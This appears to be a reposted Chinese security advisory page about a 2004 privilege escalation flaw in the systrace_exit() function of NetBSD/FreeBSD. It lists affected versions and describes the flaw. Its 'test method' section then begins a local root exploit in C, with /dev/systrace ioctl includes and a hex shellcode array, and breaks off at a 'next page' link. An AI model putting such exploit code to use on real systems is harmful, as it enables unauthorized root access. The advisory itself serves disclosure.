当前位置：首页 » 服务器技术

开发技术指南» 文章正文

    引言： 信息提供： 安全公告（或线索）提供热线：51c

 

 

NetBSD/FreeBSD移植的Systrace Exit函数访问验证权限提升漏洞

【程序编程相关:多家厂商DNS解析函数库远程缓冲区溢出漏】

【推荐阅读:Sun RPC XDR库xdr_arr】

信息提供: 【扩展信息:FreeBSD FFS文件系统任意块读写】

安全公告（或线索）提供热线:51cto.editor@gmail.com

漏洞类别:

权限提升漏洞

攻击类型:

远程攻击

发布日期:

2004-05-12

更新日期:

2004-05-18

受影响系统:

netbsd netbsd 2.0

安全系统:

netbsd netbsd 1.6.2

netbsd netbsd 1.6.1

netbsd netbsd 1.6

netbsd netbsd 1.5.3

netbsd netbsd 1.5.2

netbsd netbsd 1.5.1

漏洞报告人:

stefan esser

漏洞描述:

bugtraq  id: 10320

netbsd/freebsd是开放源代码操作系统,systrace可通过强制系统调用的访问策略监视并且控制应用程序访问系统.

netbsd/freebsd的systrace的实现存在访问验证问题,本地攻击者可以利用这个漏洞提升权限.

systrace_exit()没有检查连接到systrace的进程是否属于超级用户权限,在exit操作时会设置euid为0,因此本地攻击者可以利用这个问题提升权限.

测试方法:

警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.使用者风险自负！

#include <stdio.h>

#include <sys/ioctl.h>

#include <fcntl.h>

#include <sys/systrace.h>

#define systrace_device "/dev/systrace"

char magic[] = "\x53\x31\xc0\x50\x50\x50\x50\xb8\x03\x00\x00\x00"

"\xcd\x80\x83\xc4\x10\xb8\x00\x00\xc0\xbf\x94\x50"

...   下一页

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：